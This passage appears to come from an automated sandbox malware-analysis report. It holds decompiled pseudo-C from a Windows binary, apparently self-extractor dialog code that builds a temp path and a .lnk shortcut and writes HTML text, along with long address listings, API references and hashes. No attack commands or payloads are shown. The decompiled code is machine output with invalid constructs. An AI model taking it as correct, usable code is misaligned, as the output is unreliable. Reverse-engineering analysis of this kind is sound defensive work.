											__ebp - 0x1c3c = E00214D7E(__ebp - 0x1c3c, __ebp - 0x1c3c);
											_pop(__ecx);
											_pop(__ecx);
										}
										L149:
										__eflags =  *(__ebp - 0x11c8c);
										__ebx = 0x800;
										if( *(__ebp - 0x11c8c) != 0) {
											_push(0x800);
											__eax = __ebp - 0x9c8c;
											_push(__ebp - 0x9c8c);
											__eax = __ebp - 0x11c8c;
											_push(__ebp - 0x11c8c);
											__eax = E001FAED7();
										}
										_push(__ebx);
										__eax = __ebp - 0xbc8c;
										_push(__ebp - 0xbc8c);
										__eax = __ebp - 0x6c84;
										_push(__ebp - 0x6c84);
										__eax = E001FAED7();
										__eflags =  *(__ebp - 0x2c3c);
										if(__eflags == 0) {
											__ebp - 0x2c3c = E0020A24E(__ecx, __ebp - 0x2c3c,  *(__ebp - 0x14));
										}
										__ebp - 0x2c3c = E001FAEA5(__eflags, __ebp - 0x2c3c, __ebx);
										__eflags =  *((short*)(__ebp - 0x17c8c));
										if(__eflags != 0) {
											__ebp - 0x17c8c = __ebp - 0x2c3c;
											E001FFA89(__eflags, __ebp - 0x2c3c, __ebp - 0x17c8c, __ebx) = __ebp - 0x2c3c;
											__eax = E001FAEA5(__eflags, __ebp - 0x2c3c, __ebx);
										}
										__ebp - 0x2c3c = __ebp - 0xcc8c;
										__eax = E00214D7E(__ebp - 0xcc8c, __ebp - 0x2c3c);
										__eflags =  *(__ebp - 0x13c8c);
										__eax = __ebp - 0x13c8c;
										_pop(__ecx);
										_pop(__ecx);
										if(__eflags == 0) {
											__eax = __ebp - 0x19c8c;
										}
										__ebp - 0x2c3c = E001FFA89(__eflags, __ebp - 0x2c3c, __ebp - 0x2c3c, __ebx);
										__eax = __ebp - 0x2c3c;
										__eflags = E001FB153(__ebp - 0x2c3c);
										if(__eflags == 0) {
											L159:
											__ebp - 0x2c3c = E001FFA89(__eflags, __ebp - 0x2c3c, L".lnk", __ebx);
											goto L160;
										} else {
											L158:
											__eflags = __eax;
											if(__eflags == 0) {
												L160:
												_push(1);
												__eax = __ebp - 0x2c3c;
												_push(__ebp - 0x2c3c);
												E001F9D3A(__ecx, __ebp) = __ebp - 0xbc8c;
												__ebp - 0xac8c = E00214D7E(__ebp - 0xac8c, __ebp - 0xbc8c);
												_pop(__ecx);
												_pop(__ecx);
												__ebp - 0xac8c = E001FB98D(__eflags, __ebp - 0xac8c);
												__ecx =  *(__ebp - 0x1c3c) & 0x0000ffff;
												__eax = __ebp - 0x1c3c;
												__ecx =  ~( *(__ebp - 0x1c3c) & 0x0000ffff);
												__edx = __ebp - 0x9c8c;
												__esi = __ebp - 0xac8c;
												asm("sbb ecx, ecx");
												__ecx =  ~( *(__ebp - 0x1c3c) & 0x0000ffff) & __ebp - 0x00001c3c;
												 *(__ebp - 0x9c8c) & 0x0000ffff =  ~( *(__ebp - 0x9c8c) & 0x0000ffff);
												asm("sbb eax, eax");
												__eax =  ~( *(__ebp - 0x9c8c) & 0x0000ffff) & __ebp - 0x00009c8c;
												 *(__ebp - 0xac8c) & 0x0000ffff =  ~( *(__ebp - 0xac8c) & 0x0000ffff);
												__eax = __ebp - 0x15c8c;
												asm("sbb edx, edx");
												__edx =  ~( *(__ebp - 0xac8c) & 0x0000ffff) & __esi;
												E00209D41(__ebp - 0x15c8c) = __ebp - 0x2c3c;
												__ebp - 0xbc8c = E00209450(__ecx, __edi, __ebp - 0xbc8c, __ebp - 0x2c3c,  ~( *(__ebp - 0xac8c) & 0x0000ffff) & __esi, __ebp - 0xbc8c,  ~( *(__ebp - 0x9c8c) & 0x0000ffff) & __ebp - 0x00009c8c,  ~( *(__ebp - 0x1c3c) & 0x0000ffff) & __ebp - 0x00001c3c);
												__eflags =  *(__ebp - 0xcc8c);
												if( *(__ebp - 0xcc8c) != 0) {
													_push(__edi);
													__eax = __ebp - 0xcc8c;
													_push(__ebp - 0xcc8c);
													_push(5);
													_push(0x1000);
													__eax =  *0x22def8();
												}
												goto L164;
											}
											goto L159;
										}
									}
								case 0xb:
									L162:
									__eflags = __ebx - 7;
									if(__ebx == 7) {
										 *0x239600 = 1;
									}
									goto L164;
								case 0xc:
									L83:
									__eax =  *(__ebp - 0x5c84) & 0x0000ffff;
									__eax = E002159C0( *(__ebp - 0x5c84) & 0x0000ffff);
									__eflags = __eax - 0x46;
									if(__eax == 0x46) {
										 *0x2375d4 = 1;
									} else {
										__eflags = __eax - 0x55;
										if(__eax == 0x55) {
											 *0x2375d5 = 1;
										} else {
											__eax = 0;
											 *0x2375d4 = __al;
											 *0x2375d5 = __al;
										}
									}
									goto L164;
								case 0xd:
									L93:
									 *0x24de21 = 1;
									__eax = __eax + 0x24de21;
									_t104 = __esi + 0x39;
									 *_t104 =  *(__esi + 0x39) + __esp;
									__eflags =  *_t104;
									__ebp = 0xffffa37c;
									if( *_t104 != 0) {
										_t106 = __ebp - 0x5c84; // 0xffff46f8
										__eax = _t106;
										_push(_t106);
										 *0x22d5fc = E002013FC();
									}
									goto L164;
							}
							L2:
							_t210 = E00209E24(_t210, _t279);
							_t279 = _t279 + 0x2000;
							_t277 = _t277 - 1;
							if(_t277 != 0) {
								goto L2;
							} else {
								_t280 = _t277;
								goto L4;
							}
						}
						L165:
						 *[fs:0x0] =  *((intOrPtr*)(_t285 - 0xc));
						return _t209;
					}
					L100:
					__eflags =  *0x245d02;
					if( *0x245d02 != 0) {
						goto L164;
					}
					L101:
					__eax = 0;
					 *(__ebp - 0x143c) = __ax;
					__eax = __ebp - 0x5c84;
					_push(__ebp - 0x5c84);
					__eax = E00210BB8(__ecx);
					_pop(__ecx);
					__ecx = 0x2c;
					__eflags = __eax;
					if(__eax != 0) {
						L108:
						__eflags =  *(__ebp - 0x143c);
						if( *(__ebp - 0x143c) == 0) {
							__ebp - 0x1bc8c = __ebp - 0x5c84;
							E001FFAB1(__ebp - 0x5c84, __ebp - 0x1bc8c, 0x1000) = __ebp - 0x19c8c;
							__ebp - 0x143c = E001FFAB1(__ebp - 0x143c, __ebp - 0x19c8c, 0x200);
						}
						__ebp - 0x5c84 = E00209C4F(__ebp - 0x5c84);
						__eax = 0;
						 *(__ebp - 0x4c84) = __ax;
						__ebp - 0x143c = __ebp - 0x5c84;
						__eax = E00209735( *(__ebp + 8), __ebp - 0x5c84, __ebp - 0x143c, 0x24);
						__eflags = __eax - 6;
						if(__eax == 6) {
							goto L164;
						} else {
							L111:
							__eax = 0;
							__eflags = 0;
							 *0x2375d7 = 1;
							 *0x2385fa = __ax;
							__eax = EndDialog( *(__ebp + 8), 1);
							goto L112;
						}
					}
					L102:
					__esi = 0;
					__eflags =  *(__ebp - 0x5c84) - __dx;
					if( *(__ebp - 0x5c84) == __dx) {
						goto L108;
					}
					L103:
					__ecx = 0;
					__eax = __ebp - 0x5c84;
					while(1) {
						L104:
						__eflags =  *__eax - 0x40;
						if( *__eax == 0x40) {
							break;
						}
						L105:
						__esi =  &(__esi->i);
						__eax = __ebp - 0x5c84;
						__ecx = __esi + __esi;
						__eax = __ebp - 0x5c84 + __ecx;
						__eflags =  *__eax - __dx;
						if( *__eax != __dx) {
							continue;
						}
						L106:
						goto L108;
					}
					L107:
					__ebp - 0x5c82 = __ebp - 0x5c82 + __ecx;
					__ebp - 0x143c = E001FFAB1(__ebp - 0x143c, __ebp - 0x5c82 + __ecx, 0x200);
					__eax = 0;
					__eflags = 0;
					 *(__ebp + __esi * 2 - 0x5c84) = __ax;
					goto L108;
					L112:
					__eflags = _t263 - 7;
					if(_t263 == 7) {
						__eflags =  *0x2395fc;
						if( *0x2395fc == 0) {
							 *0x2395fc = 2;
						}
						 *0x2385f8 = 1;
					}
					goto L164;
				}
			}










          0x0020bb5b
          0x0020bb5b
          0x0020bb5b
          0x0020bb5b
          0x0020bb5e
          0x00000000
          0x00000000
          0x0020bb64
          0x0020bb64
          0x0020bb6a
          0x0020bb78
          0x0020bb84
          0x0020bb86
          0x0020bb88
          0x0020bb8d
          0x0020bb8d
          0x0020bb8d
          0x0020bba5
          0x0020bbb2
          0x0020bbb7
          0x0020bbb9
          0x00000000
          0x00000000
          0x0020bb8b
          0x0020bb8b
          0x0020bb8b
          0x0020bb8c
          0x0020bb8c
          0x0020bbbb
          0x0020bbc5
          0x0020bbcb
          0x0020bbd3
          0x0020c093
          0x0020c093
          0x0020c093
          0x0020c098
          0x0020c09c
          0x0020c0a0
          0x0020c0a7
          0x0020c0ae
          0x0020c0b1
          0x0020c0b6
          0x0020c0b9
          0x0020c0be
          0x0020b51d
          0x0020b523
          0x0020b529
          0x0020b529
          0x00000000
          0x00000000
          0x00000000
          0x00000000
          0x0020b53e
          0x0020b555
          0x0020b559
          0x00000000
          0x0020b55b
          0x00000000
          0x0020b55b
          0x0020b559
          0x0020b560
          0x0020b563
          0x00000000
          0x00000000
          0x0020b569
          0x0020b569
          0x00000000
          0x0020b570
          0x0020b570
          0x0020b573
          0x00000000
          0x00000000
          0x0020b579
          0x0020b579
          0x0020b586
          0x0020b5ac
          0x0020b5b7
          0x0020b5c1
          0x0020b5cc
          0x0020b5d1
          0x0020b5d9
          0x0020b5df
          0x0020b5e4
          0x0020b5e6
          0x0020b74b
          0x0020b74b
          0x0020b755
          0x00000000
          0x0020b5ec
          0x0020b5f2
          0x0020b614
          0x0020b623
          0x0020b630
          0x0020b641
          0x0020b644
          0x0020b647
          0x0020b65a
          0x0020b661
          0x0020b666
          0x0020b668
          0x00000000
          0x00000000
          0x0020b66e
          0x0020b675
          0x0020b67a
          0x0020b67f
          0x0020b68b
          0x0020b690
          0x0020b693
          0x0020b69a
          0x0020b69c
          0x0020b69d
          0x0020b6a7
          0x0020b6ad
          0x0020b6ae
          0x00000000
          0x0020b6ae
          0x0020b649
          0x0020b650
          0x0020b656
          0x0020b658
          0x00000000
          0x00000000
          0x00000000
          0x0020b6b4
          0x0020b6bb
          0x0020b6bd
          0x0020b6c0
          0x0020b730
          0x0020b730
          0x0020b738
          0x0020b73e
          0x0020b743
          0x0020b745
          0x0020b5f4
          0x0020b5f9
          0x0020b601
          0x0020b607
          0x0020b60e
          0x00000000
          0x00000000
          0x00000000
          0x0020b60e
          0x00000000
          0x0020b745
          0x0020b6c2
          0x0020b6c9
          0x0020b6cf
          0x0020b6d1
          0x00000000
          0x0020b6d3
          0x0020b6d3
          0x0020b6d5
          0x0020b6d6
          0x0020b6da
          0x0020b6f2
          0x0020b6f7
          0x0020b701
          0x0020b703
          0x0020b706
          0x0020b6d8
          0x0020b6d8
          0x0020b6d9
          0x00000000
          0x0020b708
          0x0020b716
          0x0020b71c
          0x0020b71e
          0x0020b72a
          0x0020b72a
          0x00000000
          0x0020b71e
          0x0020b706
          0x0020b6d1
          0x00000000
          0x0020b75f
          0x0020b75f
          0x0020b761
          0x0020b767
          0x0020b76c
          0x0020b76e
          0x0020b771
          0x0020b773
          0x0020b780
          0x0020b785
          0x0020b786
          0x0020b786
          0x0020b787
          0x0020b787
          0x0020b78a
          0x0020b78c
          0x0020b796
          0x0020b799
          0x0020b79f
          0x0020b7a1
          0x0020b78e
          0x0020b78e
          0x0020b78e
          0x0020b7a6
          0x0020b7a8
          0x0020b7b1
          0x0020b7b1
          0x0020b7b3
          0x0020b7b4
          0x0020b7b9
          0x0020b7c2
          0x0020b7c3
          0x0020b7c9
          0x0020b7ce
          0x0020b7d1
          0x0020b7d3
          0x0020b7d5
          0x0020b7da
          0x0020b7dc
          0x0020b7de
          0x0020b7de
          0x0020b7e0
          0x0020b7e0
          0x0020b7e5
          0x0020b7ea
          0x0020b7eb
          0x0020b7eb
          0x0020b7ec
          0x0020b7ee
          0x0020b7f5
          0x0020b7fa
          0x0020b7ee
          0x00000000
          0x00000000
          0x0020b800
          0x0020b800
          0x0020b802
          0x0020b812
          0x0020b812
          0x00000000
          0x00000000
          0x0020b81d
          0x0020b81d
          0x0020b81f
          0x00000000
          0x00000000
          0x0020b825
          0x0020b825
          0x0020b82c
          0x00000000
          0x00000000
          0x0020b832
          0x0020b832
          0x0020b834
          0x0020b83a
          0x0020b83c
          0x0020b843
          0x0020b844
          0x0020b84b
          0x0020b84d
          0x0020b84d
          0x0020b854
          0x0020b859
          0x0020b85f
          0x0020b861
          0x00000000
          0x0020b867
          0x0020b867
          0x0020b867
          0x0020b86a
          0x0020b86c
          0x0020b86d
          0x0020b870
          0x0020b899
          0x0020b899
          0x0020b89c
          0x0020b981
          0x0020b98a
          0x0020b98f
          0x0020b98f
          0x0020b991
          0x0020b991
          0x0020b993
          0x0020b995
          0x0020b99c
          0x0020b9a1
          0x0020b9a2
          0x0020b9a3
          0x0020b9a5
          0x0020b9a7
          0x0020b9ab
          0x0020b9ad
          0x0020b9ad
          0x0020b9af
          0x0020b9af
          0x0020b9ab
          0x0020b9b3
          0x0020b9b9
          0x0020b9c6
          0x0020b9cd
          0x0020b9dd
          0x0020b9e7
          0x0020b9ef
          0x0020b9fb
          0x0020b9fd
          0x0020ba05
          0x0020ba0a
          0x0020ba0b
          0x0020ba0c
          0x0020ba0e
          0x0020ba1b
          0x0020ba24
          0x0020ba24
          0x00000000
          0x0020ba0e
          0x0020b8a2
          0x0020b8a2
          0x0020b8a5
          0x0020b8b2
          0x0020b8b2
          0x0020b8b5
          0x0020b8b7
          0x0020b8b8
          0x0020b8ba
          0x0020b8bb
          0x0020b8c0
          0x0020b8c5
          0x0020b8cb
          0x0020b8cd
          0x0020b8cf
          0x0020b8d2
          0x0020b8d9
          0x0020b8da
          0x0020b8e0
          0x0020b8e1
          0x0020b8e4
          0x0020b8e5
          0x0020b8e6
          0x0020b8eb
          0x0020b8ee
          0x0020b8f4
          0x0020b8fd
          0x0020b900
          0x0020b905
          0x0020b907
          0x0020b909
          0x0020b90b
          0x0020b90b
          0x0020b90d
          0x0020b90d
          0x0020b90f
          0x0020b90f
          0x0020b917
          0x0020b91e
          0x0020b920
          0x0020b927
          0x0020b92d
          0x0020b92f
          0x0020b930
          0x0020b938
          0x0020b947
          0x0020b947
          0x0020b938
          0x0020b952
          0x0020b954
          0x0020b963
          0x0020b969
          0x0020b96f
          0x0020b97a
          0x0020b97a
          0x00000000
          0x0020b96f
          0x0020b8a7
          0x0020b8a7
          0x0020b8ac
          0x00000000
          0x00000000
          0x00000000
          0x0020b8ac
          0x0020b872
          0x0020b872
          0x0020b876
          0x00000000
          0x00000000
          0x0020b878
          0x0020b878
          0x0020b87b
          0x0020b87d
          0x0020b880
          0x00000000
          0x00000000
          0x0020b886
          0x0020b88f
          0x00000000
          0x0020b88f
          0x00000000
          0x0020ba2b
          0x0020ba2b
          0x0020ba2c
          0x0020ba31
          0x0020ba33
          0x0020ba36
          0x0020ba36
          0x00000000
          0x0020ba6c
          0x0020ba6c
          0x0020ba73
          0x0020ba75
          0x0020ba75
          0x0020ba77
          0x0020baa6
          0x0020baa6
          0x0020baac
          0x00000000
          0x0020baac
          0x0020ba79
          0x0020ba79
          0x0020ba79
          0x0020ba7c
          0x0020ba95
          0x0020ba95
          0x0020ba9b
          0x0020ba9b
          0x00000000
          0x0020ba9b
          0x0020ba7e
          0x0020ba7e
          0x0020ba7e
          0x0020ba81
          0x00000000
          0x00000000
          0x0020ba83
          0x0020ba83
          0x0020ba83
          0x0020ba86
          0x00000000
          0x00000000
          0x0020ba8c
          0x0020ba8c
          0x00000000
          0x00000000
          0x0020baf9
          0x0020baf9
          0x0020bafc
          0x00000000
          0x00000000
          0x0020bafe
          0x0020bafe
          0x0020bb0a
          0x0020bb0f
          0x0020bb10
          0x0020bb11
          0x0020bb13
          0x00000000
          0x00000000
          0x0020bb15
          0x0020bb15
          0x00000000
          0x00000000
          0x00000000
          0x00000000
          0x0020bd07
          0x0020bd07
          0x0020bd0a
          0x0020bd0c
          0x0020bd13
          0x0020bd15
          0x0020bd1b
          0x0020bd1c
          0x0020bd21
          0x0020bd22
          0x0020bd22
          0x0020bd27
          0x0020bd2a
          0x0020bd30
          0x0020bd30
          0x0020bd35
          0x00000000
          0x00000000
          0x0020bd41
          0x0020bd41
          0x0020bd44
          0x0020bb25
          0x0020bb25
          0x00000000
          0x0020bb25
          0x0020bd4a
          0x0020bd4a
          0x0020bb16
          0x0020bb16
          0x0020bb1c
          0x0020bb1d
          0x0020bb20
          0x00000000
          0x00000000
          0x0020bd51
          0x0020bd51
          0x0020bd54
          0x00000000
          0x00000000
          0x0020bd5a
          0x0020bd5a
          0x0020bd5c
          0x0020bd63
          0x0020bd6b
          0x0020bd71
          0x0020bd76
          0x0020bd79
          0x0020bdae
          0x0020bdb3
          0x0020bdb9
          0x0020bdba
          0x0020bdbf
          0x0020bd7b
          0x0020bd7b
          0x0020bd7e
          0x0020bd84
          0x0020bd9a
          0x0020bd9f
          0x0020bda0
          0x0020bda5
          0x0020bd86
          0x0020bd86
          0x0020bd8b
          0x0020bd8c
          0x0020bd91
          0x0020bd91
          0x0020bd84
          0x0020bdc6
          0x0020bdc8
          0x0020bdcf
          0x0020bddd
          0x0020bde4
          0x0020bde9
          0x0020bdea
          0x0020bdeb
          0x0020bded
          0x0020bdee
          0x0020bdf5
          0x0020be3e
          0x0020be45
          0x0020be4a
          0x0020be4c
          0x00000000
          0x00000000
          0x0020be52
          0x0020be52
          0x0020be54
          0x0020be5a
          0x0020be61
          0x00000000
          0x00000000
          0x0020be63
          0x0020be63
          0x0020be65
          0x0020be66
          0x0020be66
          0x0020be66
          0x0020be69
          0x0020be6c
          0x0020be76
          0x0020be76
          0x0020be78
          0x0020be7a
          0x0020be84
          0x0020be89
          0x0020be8b
          0x0020bec9
          0x0020bec9
          0x0020becc
          0x0020becc
          0x0020bece
          0x0020becf
          0x0020becf
          0x00000000
          0x0020becf
          0x0020be8d
          0x0020be8d
          0x0020be8f
          0x0020be90
          0x0020be92
          0x0020be95
          0x0020beaa
          0x0020beaa
          0x0020beac
          0x0020bead
          0x0020bead
          0x0020bead
          0x0020beb0
          0x0020beb0
          0x0020beb5
          0x0020beb6
          0x0020bebc
          0x0020bebc
          0x0020bebd
          0x0020bec2
          0x0020bec3
          0x0020bec4
          0x00000000
          0x0020bec4
          0x0020be97
          0x0020be97
          0x0020be9e
          0x0020bea1
          0x0020bea2
          0x00000000
          0x0020bea2
          0x0020be6e
          0x0020be6e
          0x0020be70
          0x0020be71
          0x0020be74
          0x00000000
          0x00000000
          0x00000000
          0x0020bed1
          0x0020bed1
          0x0020bed4
          0x0020bed4
          0x0020bed9
          0x0020bedb
          0x0020bedd
          0x0020bedd
          0x0020bedf
          0x0020bedf
          0x00000000
          0x0020bdf7
          0x0020bdf7
          0x0020bdfe
          0x0020be0a
          0x0020be10
          0x0020be11
          0x0020be12
          0x0020be17
          0x0020be1a
          0x0020be1c
          0x0020be22
          0x0020be24
          0x0020be32
          0x0020be37
          0x0020be38
          0x0020be38
          0x0020bee2
          0x0020bee2
          0x0020beea
          0x0020beef
          0x0020bef1
          0x0020bef2
          0x0020bef8
          0x0020bef9
          0x0020beff
          0x0020bf00
          0x0020bf00
          0x0020bf05
          0x0020bf06
          0x0020bf0c
          0x0020bf0d
          0x0020bf13
          0x0020bf14
          0x0020bf19
          0x0020bf21
          0x0020bf2d
          0x0020bf2d
          0x0020bf3a
          0x0020bf3f
          0x0020bf47
          0x0020bf51
          0x0020bf5e
          0x0020bf65
          0x0020bf65
          0x0020bf71
          0x0020bf78
          0x0020bf7d
          0x0020bf85
          0x0020bf8b
          0x0020bf8c
          0x0020bf8d
          0x0020bf8f
          0x0020bf8f
          0x0020bfa4
          0x0020bfa9
          0x0020bfb5
          0x0020bfb7
          0x0020bfc8
          0x0020bfd5
          0x00000000
          0x0020bfb9
          0x0020bfb9
          0x0020bfc4
          0x0020bfc6
          0x0020bfda
          0x0020bfda
          0x0020bfdc
          0x0020bfe2
          0x0020bfe8
          0x0020bff6
          0x0020bffb
          0x0020bffc
          0x0020c004
          0x0020c009
          0x0020c010
          0x0020c016
          0x0020c018
          0x0020c01e
          0x0020c024
          0x0020c026
          0x0020c02f
          0x0020c032
          0x0020c034
          0x0020c03d
          0x0020c040
          0x0020c046
          0x0020c049
          0x0020c052
          0x0020c061
          0x0020c066
          0x0020c06e
          0x0020c070
          0x0020c071
          0x0020c077
          0x0020c078
          0x0020c07a
          0x0020c07f
          0x0020c07f
          0x00000000
          0x0020c06e
          0x00000000
          0x0020bfc6
          0x0020bfb7
          0x00000000
          0x0020c087
          0x0020c087
          0x0020c08a
          0x0020c08c
          0x0020c08c
          0x00000000
          0x00000000
          0x0020bab8
          0x0020bab8
          0x0020bac0
          0x0020bac6
          0x0020bac9
          0x0020baed
          0x0020bacb
          0x0020bacb
          0x0020bace
          0x0020bae1
          0x0020bad0
          0x0020bad0
          0x0020bad2
          0x0020bad7
          0x0020bad7
          0x0020bace
          0x00000000
          0x00000000
          0x0020bb31
          0x0020bb31
          0x0020bb32
          0x0020bb37
          0x0020bb37
          0x0020bb37
          0x0020bb3a
          0x0020bb3f
          0x0020bb45
          0x0020bb45
          0x0020bb4b
          0x0020bb51
          0x0020bb51
          0x00000000
          0x00000000
          0x0020b52a
          0x0020b52c
          0x0020b531
          0x0020b537
          0x0020b53a
          0x00000000
          0x0020b53c
          0x0020b53c
          0x00000000
          0x0020b53c
          0x0020b53a
          0x0020c0c4
          0x0020c0ca
          0x0020c0d4
          0x0020c0d4
          0x0020bbd9
          0x0020bbd9
          0x0020bbe0
          0x00000000
          0x00000000
          0x0020bbe6
          0x0020bbe6
          0x0020bbe8
          0x0020bbef
          0x0020bbf7
          0x0020bbf8
          0x0020bbfd
          0x0020bbfe
          0x0020bbff
          0x0020bc01
          0x0020bc55
          0x0020bc55
          0x0020bc5d
          0x0020bc6b
          0x0020bc7c
          0x0020bc8a
          0x0020bc8a
          0x0020bc96
          0x0020bc9b
          0x0020bc9d
          0x0020bcad
          0x0020bcb7
          0x0020bcbc
          0x0020bcbf
          0x00000000
          0x0020bcc5
          0x0020bcc5
          0x0020bcca
          0x0020bcca
          0x0020bccc
          0x0020bcd3
          0x0020bcd9
          0x00000000
          0x0020bcd9
          0x0020bcbf
          0x0020bc03
          0x0020bc05
          0x0020bc07
          0x0020bc0e
          0x00000000
          0x00000000
          0x0020bc10
          0x0020bc10
          0x0020bc12
          0x0020bc18
          0x0020bc18
          0x0020bc18
          0x0020bc1c
          0x00000000
          0x00000000
          0x0020bc1e
          0x0020bc1e
          0x0020bc1f
          0x0020bc25
          0x0020bc28
          0x0020bc2a
          0x0020bc2d
          0x00000000
          0x00000000
          0x0020bc2f
          0x00000000
          0x0020bc2f
          0x0020bc31
          0x0020bc3c
          0x0020bc46
          0x0020bc4b
          0x0020bc4b
          0x0020bc4d
          0x00000000
          0x0020bcdf
          0x0020bcdf
          0x0020bce2
          0x0020bce8
          0x0020bcef
          0x0020bcf1
          0x0020bcf1
          0x0020bcfb
          0x0020bcfb
          0x00000000
          0x0020bce2

          APIs
          • GetTempPathW.KERNEL32(00000800,?), ref: 0020BB71
          • _swprintf.LIBCMT ref: 0020BBA5
            • Part of subcall function 001F3E41: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 001F3E54
          • SetDlgItemTextW.USER32(?,00000066,002385FA), ref: 0020BBC5
          • _wcschr.LIBVCRUNTIME ref: 0020BBF8
          • EndDialog.USER32(?,00000001), ref: 0020BCD9
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcschr
          • String ID: %s%s%u
          • API String ID: 2892007947-1360425832
          • Opcode ID: 05fd29f46a2fabc6a48703a7d552ef10fd3ab7d0412adf1675bc48d71563174b
          • Instruction ID: 4acdb229ef30740fbcff7de695ead3d3f2893cef882ee7dbfd8d2d99d2daecb6
          • Opcode Fuzzy Hash: 05fd29f46a2fabc6a48703a7d552ef10fd3ab7d0412adf1675bc48d71563174b
          • Instruction Fuzzy Hash: F6414E7191031AAEEF26DF60DC85FEE77B8EB14304F5044A6F509E6092EF709A948F51
          Uniqueness

          Uniqueness Score: -1.00%

          Function 002088BF, Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 124memoryCOMMON
          Download Yara Rule
          C-Code - Quality: 82%
          			E002088BF(void* __edx) {
				void* __ecx;
				void* _t20;
				short* _t24;
				void* _t28;
				signed int _t29;
				intOrPtr _t31;
				intOrPtr* _t38;
				void* _t44;
				void* _t58;
				intOrPtr* _t60;
				short* _t62;
				short* _t64;
				intOrPtr* _t67;
				long _t69;
				void* _t71;
				void* _t72;

				_t58 = __edx;
				_t43 = _t44;
				if( *((intOrPtr*)(_t44 + 0x10)) == 0) {
					return _t20;
				}
				 *(_t71 + 4) =  *(_t71 + 4) & 0x00000000;
				_t60 =  *((intOrPtr*)(_t71 + 0x18));
				 *((char*)(_t71 + 0x1c)) = E002087A5(_t60);
				_push(0x200 + E00212B33(_t60) * 2);
				_t24 = E00212B53(_t44);
				_t64 = _t24;
				if(_t64 == 0) {
					L16:
					return _t24;
				}
				E00214D7E(_t64, L"<html>");
				E002166ED(_t64, L"<head><meta http-equiv=\"content-type\" content=\"text/html; charset=");
				E002166ED(_t64, L"utf-8\"></head>");
				_t72 = _t71 + 0x18;
				_t67 = _t60;
				_t28 = 0x20;
				if( *_t60 != _t28) {
					L4:
					_t29 = E00201432(_t76, _t67, L"<html>", 6);
					asm("sbb al, al");
					_t31 =  ~_t29 + 1;
					 *((intOrPtr*)(_t72 + 0x14)) = _t31;
					if(_t31 != 0) {
						_t60 = _t67 + 0xc;
					}
					E002166ED(_t64, _t60);
					if( *((char*)(_t72 + 0x1c)) == 0) {
						E002166ED(_t64, L"</html>");
					}
					_t79 =  *((char*)(_t72 + 0x1c));
					if( *((char*)(_t72 + 0x1c)) == 0) {
						_push(_t64);
						_t64 = E00208ACA(_t58, _t79);
					}
					_t69 = 9 + E00212B33(_t64) * 6;
					_t62 = GlobalAlloc(0x40, _t69);
					if(_t62 != 0) {
						_t13 = _t62 + 3; // 0x3
						if(WideCharToMultiByte(0xfde9, 0, _t64, 0xffffffff, _t13, _t69 - 3, 0, 0) == 0) {
							 *_t62 = 0;
						} else {
							 *_t62 = 0xbbef;
							 *((char*)(_t62 + 2)) = 0xbf;
						}
					}
					L00212B4E(_t64);
					_t24 =  *0x22dff8(_t62, 1, _t72 + 0x10);
					if(_t24 >= 0) {
						E002087DC( *((intOrPtr*)(_t43 + 0x10)));
						_t38 =  *((intOrPtr*)(_t72 + 0xc));
						_t24 =  *((intOrPtr*)( *_t38 + 8))(_t38,  *((intOrPtr*)(_t72 + 0xc)));
					}
					goto L16;
				} else {
					goto L3;
				}
				do {
					L3:
					_t67 = _t67 + 2;
					_t76 =  *_t67 - _t28;
				} while ( *_t67 == _t28);
				goto L4;
			}



















          0x002088bf
          0x002088c2
          0x002088c8
          0x00208a04
          0x00208a04
          0x002088ce
          0x002088d5
          0x002088e0
          0x002088f0
          0x002088f1
          0x002088f6
          0x002088fc
          0x002089ff
          0x00000000
          0x00208a00
          0x00208909
          0x00208914
          0x0020891f
          0x00208924
          0x00208927
          0x0020892b
          0x0020892f
          0x0020893a
          0x00208942
          0x00208949
          0x0020894b
          0x0020894d
          0x00208951
          0x00208953
          0x00208953
          0x00208958
          0x00208964
          0x0020896c
          0x00208972
          0x00208973
          0x00208978
          0x0020897a
          0x00208982
          0x00208982
          0x0020898e
          0x0020899a
          0x0020899e
          0x002089a8
          0x002089bd
          0x002089ca
          0x002089bf
          0x002089bf
          0x002089c4
          0x002089c4
          0x002089bd
          0x002089ce
          0x002089dc
          0x002089e5
          0x002089f0
          0x002089f5
          0x002089fc
          0x002089fc
          0x00000000
          0x00000000
          0x00000000
          0x00000000
          0x00208931
          0x00208931
          0x00208931
          0x00208934
          0x00208934
          0x00000000

          APIs
          • GlobalAlloc.KERNEL32(00000040,?,?,?,?,?,?,?,?,?,?,?,?,?,?,002087A0), ref: 00208994
          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 002089B5
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: AllocByteCharGlobalMultiWide
          • String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
          • API String ID: 3286310052-4209811716
          • Opcode ID: 67c9353fb8e62a31dd83bc157243e25569a542e64a519d7a1aba925bcaa9bf2b
          • Instruction ID: 0c46bf79d068f83c9a5b82517749b138b3828fb35d53c22501ab6656709a994c
          • Opcode Fuzzy Hash: 67c9353fb8e62a31dd83bc157243e25569a542e64a519d7a1aba925bcaa9bf2b
